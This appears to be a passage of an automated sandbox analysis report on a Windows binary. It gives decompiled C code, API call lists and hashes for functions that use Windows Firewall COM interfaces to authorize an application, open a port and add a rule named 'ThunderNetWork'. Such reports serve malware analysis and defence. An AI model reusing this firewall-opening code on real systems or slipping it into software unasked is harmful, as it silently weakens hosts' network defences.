                                                                                                                                                                    								_t80 = E00B180F0( &_v40, "HNetCfg.FwAuthorizedApplication");
                                                                                                                                                                    								__imp__CLSIDFromProgID(_t80,  &_v24);
                                                                                                                                                                    								_t117 = _t80;
                                                                                                                                                                    								if(_t80 >= 0) {
                                                                                                                                                                    									_t83 =  *_t100( &_v24, 0, 5, 0xb1c17c,  &_v28);
                                                                                                                                                                    									_t117 = _t83;
                                                                                                                                                                    									if(_t83 >= 0) {
                                                                                                                                                                    										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E00B180F0( &_v40, _v48));
                                                                                                                                                                    										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00B180F0(_t115, _v52));
                                                                                                                                                                    										_t90 = _v28;
                                                                                                                                                                    										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
                                                                                                                                                                    										_t92 = _v28;
                                                                                                                                                                    										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
                                                                                                                                                                    										_t94 = _v28;
                                                                                                                                                                    										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
                                                                                                                                                                    										_t96 = _v40;
                                                                                                                                                                    										_t115 =  &_v44;
                                                                                                                                                                    										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
                                                                                                                                                                    										_t117 = _t97;
                                                                                                                                                                    										if(_t97 >= 0) {
                                                                                                                                                                    											_t98 = _v44;
                                                                                                                                                                    											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t60 = _v28;
                                                                                                                                                                    				if(_t60 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t60 + 8))(_t60);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t61 = _v44;
                                                                                                                                                                    				if(_t61 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t62 = _v40;
                                                                                                                                                                    				if(_t62 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t63 = _v32;
                                                                                                                                                                    				if(_t63 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t63 + 8))(_t63);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t64 = _v36;
                                                                                                                                                                    				if(_t64 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t64 + 8))(_t64);
                                                                                                                                                                    				}
                                                                                                                                                                    				__imp__CoUninitialize();
                                                                                                                                                                    				return E00B11C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
                                                                                                                                                                    			}

                                                                                                                                                                    0x00b118ca
                                                                                                                                                                    0x00b118cd
                                                                                                                                                                    0x00b118d5
                                                                                                                                                                    0x00b118d8
                                                                                                                                                                    0x00b118e0
                                                                                                                                                                    0x00b118e3
                                                                                                                                                                    0x00b118e8
                                                                                                                                                                    0x00b118ed
                                                                                                                                                                    0x00b118f0
                                                                                                                                                                    0x00b118f4
                                                                                                                                                                    0x00b118f6
                                                                                                                                                                    0x00b11902
                                                                                                                                                                    0x00b11902
                                                                                                                                                                    0x00b118f4
                                                                                                                                                                    0x00b11899
                                                                                                                                                                    0x00b1187d
                                                                                                                                                                    0x00b1185e
                                                                                                                                                                    0x00b11847
                                                                                                                                                                    0x00b11830
                                                                                                                                                                    0x00b11904
                                                                                                                                                                    0x00b11909
                                                                                                                                                                    0x00b1190e
                                                                                                                                                                    0x00b1190e
                                                                                                                                                                    0x00b11911
                                                                                                                                                                    0x00b11916
                                                                                                                                                                    0x00b1191b
                                                                                                                                                                    0x00b1191b
                                                                                                                                                                    0x00b1191e
                                                                                                                                                                    0x00b11923
                                                                                                                                                                    0x00b11928
                                                                                                                                                                    0x00b11928
                                                                                                                                                                    0x00b1192b
                                                                                                                                                                    0x00b11930
                                                                                                                                                                    0x00b11935
                                                                                                                                                                    0x00b11935
                                                                                                                                                                    0x00b11938
                                                                                                                                                                    0x00b1193d
                                                                                                                                                                    0x00b11942
                                                                                                                                                                    0x00b11942
                                                                                                                                                                    0x00b11945
                                                                                                                                                                    0x00b1195b

                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B117E0
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B117FE
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B11804
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B1182A
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B1186D
                                                                                                                                                                      • Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
                                                                                                                                                                      • Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00B11873
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B11893
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B118A3
                                                                                                                                                                      • Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B118B7
                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B11945
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                                    • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                    • API String ID: 4233194485-1951265404
                                                                                                                                                                    • Opcode ID: 40c89c1f479d81735772762cffa5f7248adfd13b892137fae54b3d4f9ef97080
                                                                                                                                                                    • Instruction ID: 1efecb111b58b4f1b44fdcc1e5890ceabfce0a4838e57041c9956e7007f83114
                                                                                                                                                                    • Opcode Fuzzy Hash: 40c89c1f479d81735772762cffa5f7248adfd13b892137fae54b3d4f9ef97080
                                                                                                                                                                    • Instruction Fuzzy Hash: B2512B71A00219AFCB10DBA8C889DEEBBF9FF89710B544995F915F7250DB319C82CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                    			E00B1195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				void* _v44;
                                                                                                                                                                    				char _v48;
                                                                                                                                                                    				char _v52;
                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                    				void* _t66;
                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                    				intOrPtr* _t68;
                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                    				void* _t81;
                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                    				void* _t83;
                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                    				void* _t85;
                                                                                                                                                                    				void* _t87;
                                                                                                                                                                    				void* _t90;
                                                                                                                                                                    				intOrPtr* _t93;
                                                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                                                    				intOrPtr* _t100;
                                                                                                                                                                    				intOrPtr* _t102;
                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                    				intOrPtr* _t106;
                                                                                                                                                                    				void* _t107;
                                                                                                                                                                    				intOrPtr* _t108;
                                                                                                                                                                    				char _t130;
                                                                                                                                                                    				signed int _t133;
                                                                                                                                                                    
                                                                                                                                                                    				_t128 = __edx;
                                                                                                                                                                    				_t61 =  *0xb1f008; // 0x101c184a
                                                                                                                                                                    				_v8 = _t61 ^ _t133;
                                                                                                                                                                    				_v56 = _a4;
                                                                                                                                                                    				_t130 = 0;
                                                                                                                                                                    				_v60 = _a8;
                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				_t66 = E00B180F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                                    				__imp__CLSIDFromProgID(_t66,  &_v24);
                                                                                                                                                                    				_t110 = _t66;
                                                                                                                                                                    				if(_t66 >= 0) {
                                                                                                                                                                    					_t129 = __imp__CoCreateInstance;
                                                                                                                                                                    					_t81 =  *_t129( &_v24, 0, 5, 0xb1c17c,  &_v32);
                                                                                                                                                                    					_t110 = _t81;
                                                                                                                                                                    					if(_t81 >= 0) {
                                                                                                                                                                    						_t82 = _v32;
                                                                                                                                                                    						_t128 =  &_v44;
                                                                                                                                                                    						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
                                                                                                                                                                    						_t110 = _t83;
                                                                                                                                                                    						if(_t83 >= 0) {
                                                                                                                                                                    							_t84 = _v44;
                                                                                                                                                                    							_t128 =  &_v40;
                                                                                                                                                                    							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
                                                                                                                                                                    							_t110 = _t85;
                                                                                                                                                                    							if(_t85 >= 0) {
                                                                                                                                                                    								_t87 = E00B180F0( &_v40, "HNetCfg.FwOpenPort");
                                                                                                                                                                    								__imp__CLSIDFromProgID(_t87,  &_v24);
                                                                                                                                                                    								_t110 = _t87;
                                                                                                                                                                    								if(_t87 >= 0) {
                                                                                                                                                                    									_t90 =  *_t129( &_v24, 0, 5, 0xb1c17c,  &_v28);
                                                                                                                                                                    									_t110 = _t90;
                                                                                                                                                                    									if(_t90 >= 0) {
                                                                                                                                                                    										_t129 = _v60;
                                                                                                                                                                    										_v52 = 0;
                                                                                                                                                                    										_v48 = 0x100;
                                                                                                                                                                    										if(E00B11071(_v60,  &_v48,  &_v52) != 0) {
                                                                                                                                                                    											_t93 = _v28;
                                                                                                                                                                    											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
                                                                                                                                                                    											_t95 = _v28;
                                                                                                                                                                    											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
                                                                                                                                                                    											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00B180F0( &_v40, _v56));
                                                                                                                                                                    											_t100 = _v28;
                                                                                                                                                                    											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
                                                                                                                                                                    											_t102 = _v28;
                                                                                                                                                                    											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
                                                                                                                                                                    											_t104 = _v28;
                                                                                                                                                                    											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
                                                                                                                                                                    											_t106 = _v40;
                                                                                                                                                                    											_t128 =  &_v36;
                                                                                                                                                                    											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
                                                                                                                                                                    											_t110 = _t107;
                                                                                                                                                                    											if(_t107 >= 0) {
                                                                                                                                                                    												_t108 = _v36;
                                                                                                                                                                    												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    										_t130 = 0;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t67 = _v28;
                                                                                                                                                                    				if(_t67 != _t130) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t67 + 8))(_t67);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t68 = _v36;
                                                                                                                                                                    				if(_t68 != _t130) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t68 + 8))(_t68);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t69 = _v40;
                                                                                                                                                                    				if(_t69 != _t130) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t70 = _v44;
                                                                                                                                                                    				if(_t70 != _t130) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t70 + 8))(_t70);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t71 = _v32;
                                                                                                                                                                    				if(_t71 != _t130) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                                    				}
                                                                                                                                                                    				__imp__CoUninitialize();
                                                                                                                                                                    				return E00B11C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
                                                                                                                                                                    			}










































                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B1197E
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B1199C
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B119A2
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B119C8
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B11A0B
                                                                                                                                                                      • Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
                                                                                                                                                                      • Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00B11A11
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B11A31
                                                                                                                                                                      • Part of subcall function 00B11071: __wcstoui64.LIBCMT ref: 00B110DB
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B11A7B
                                                                                                                                                                      • Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1
                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B11B0C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                                    • String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
                                                                                                                                                                    • API String ID: 3570467124-3777566516
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E00B1323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                    				void* _t47;
                                                                                                                                                                    
                                                                                                                                                                    				_t35 = __ebx;
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0xb1dd18);
                                                                                                                                                                    				E00B13F70(__ebx, __edi, __esi);
                                                                                                                                                                    				_t45 = L"KERNEL32.DLL";
                                                                                                                                                                    				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                    					_t23 = E00B12003(_t45);
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t47 - 0x1c) = _t23;
                                                                                                                                                                    				_t46 =  *((intOrPtr*)(_t47 + 8));
                                                                                                                                                                    				 *((intOrPtr*)(_t46 + 0x5c)) = 0xb1c870;
                                                                                                                                                                    				 *((intOrPtr*)(_t46 + 0x14)) = 1;
                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                    					_t35 = GetProcAddress;
                                                                                                                                                                    					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                                                                                    					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t46 + 0x70)) = 1;
                                                                                                                                                                    				 *((char*)(_t46 + 0xc8)) = 0x43;
                                                                                                                                                                    				 *((char*)(_t46 + 0x14b)) = 0x43;
                                                                                                                                                                    				 *(_t46 + 0x68) = 0xb1f010;
                                                                                                                                                                    				E00B13C3D(_t35, 0xd);
                                                                                                                                                                    				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                                                                                                                                    				InterlockedIncrement( *(_t46 + 0x68));
                                                                                                                                                                    				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                                    				E00B13312();
                                                                                                                                                                    				E00B13C3D(_t35, 0xc);
                                                                                                                                                                    				 *(_t47 - 4) = 1;
                                                                                                                                                                    				_t28 =  *((intOrPtr*)(_t47 + 0xc));
                                                                                                                                                                    				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                    					_t32 =  *0xb1f618; // 0xb1f540
                                                                                                                                                                    					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
                                                                                                                                                                    				}
                                                                                                                                                                    				E00B12EFA( *((intOrPtr*)(_t46 + 0x6c)));
                                                                                                                                                                    				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                                    				return E00B13FB5(E00B1331B());
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B1DD18,0000000C,00B13378,00000000,00000000,?,00000000,?,00B190BC,00000000,00010000,00030000,?,00B184B4), ref: 00B1324F
                                                                                                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00B1325A
                                                                                                                                                                      • Part of subcall function 00B12003: Sleep.KERNEL32(000003E8,00000000,?,00B131A0,KERNEL32.DLL,?,00B131EC,?,00000000,?,00B190BC,00000000,00010000,00030000,?,00B184B4), ref: 00B1200F
                                                                                                                                                                      • Part of subcall function 00B12003: GetModuleHandleW.KERNEL32(00000000,?,00B131A0,KERNEL32.DLL,?,00B131EC,?,00000000,?,00B190BC,00000000,00010000,00030000,?,00B184B4), ref: 00B12018
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00B13283
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00B13293
                                                                                                                                                                    • __lock.LIBCMT ref: 00B132B5
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00B132C2
                                                                                                                                                                    • __lock.LIBCMT ref: 00B132D6
                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 00B132F4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                    • API String ID: 1028249917-2843748187
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                    			E00B11191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				void* _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				char _v28;
                                                                                                                                                                    				char _v32;
                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                    				char* _t87;
                                                                                                                                                                    				intOrPtr* _t88;
                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                    				intOrPtr* _t92;
                                                                                                                                                                    				intOrPtr* _t94;
                                                                                                                                                                    				intOrPtr* _t96;
                                                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                                                    				intOrPtr* _t100;
                                                                                                                                                                    				intOrPtr* _t102;
                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                    				intOrPtr* _t106;
                                                                                                                                                                    				intOrPtr* _t108;
                                                                                                                                                                    				char* _t110;
                                                                                                                                                                    				void* _t134;
                                                                                                                                                                    				intOrPtr _t135;
                                                                                                                                                                    				intOrPtr _t138;
                                                                                                                                                                    
                                                                                                                                                                    				_t131 = __edx;
                                                                                                                                                                    				_t134 = __eax;
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_t110 = 0x80004005;
                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v24 = E00B180F0(__edx, _a4);
                                                                                                                                                                    				_t67 = E00B180F0(__edx, "ThunderNetWork");
                                                                                                                                                                    				_v36 = _t67;
                                                                                                                                                                    				_v28 = 0x100;
                                                                                                                                                                    				__imp__#2(L"LAN");
                                                                                                                                                                    				_v40 = _t67;
                                                                                                                                                                    				E00B180F0(__edx, _a8);
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				if(E00B11071(_t134,  &_v28,  &_v32) == 0) {
                                                                                                                                                                    					_t135 = _v44;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t80 = E00B180F0(_t131, E00B11C70(_t134, ":") + 1);
                                                                                                                                                                    					_t138 = _t80;
                                                                                                                                                                    					__imp__CoInitializeEx(0, 2);
                                                                                                                                                                    					_t135 = _t80;
                                                                                                                                                                    					if(_t135 == 0x80010106 || _t135 >= 0) {
                                                                                                                                                                    						_t110 = E00B11058( &_v20,  &_v20);
                                                                                                                                                                    						if(_t110 >= 0) {
                                                                                                                                                                    							_t83 = _v20;
                                                                                                                                                                    							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
                                                                                                                                                                    							if(_t110 >= 0) {
                                                                                                                                                                    								_t85 = _v20;
                                                                                                                                                                    								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
                                                                                                                                                                    								if(_t110 >= 0) {
                                                                                                                                                                    									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
                                                                                                                                                                    										_v12 = _v12 ^ 0x00000004;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t87 =  &_v8;
                                                                                                                                                                    									__imp__CoCreateInstance(0xb1db2c, 0, 1, 0xb1db3c, _t87);
                                                                                                                                                                    									_t110 = _t87;
                                                                                                                                                                    									if(_t110 >= 0) {
                                                                                                                                                                    										_t88 = _v16;
                                                                                                                                                                    										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
                                                                                                                                                                    										_t90 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
                                                                                                                                                                    										_t92 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
                                                                                                                                                                    										_t94 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
                                                                                                                                                                    										_t96 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
                                                                                                                                                                    										_t98 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
                                                                                                                                                                    										_t100 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
                                                                                                                                                                    										_t102 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
                                                                                                                                                                    										_t104 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
                                                                                                                                                                    										_t106 = _v8;
                                                                                                                                                                    										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
                                                                                                                                                                    										_t108 = _v16;
                                                                                                                                                                    										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t71 = _v8;
                                                                                                                                                                    				if(_t71 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t72 = _v16;
                                                                                                                                                                    				if(_t72 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t73 = _v20;
                                                                                                                                                                    				if(_t73 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t73 + 8))(_t73);
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t135 >= 0) {
                                                                                                                                                                    					__imp__CoUninitialize();
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t110;
                                                                                                                                                                    			}







































                                                                                                                                                                    APIs
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B111B5
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B111C2
                                                                                                                                                                      • Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
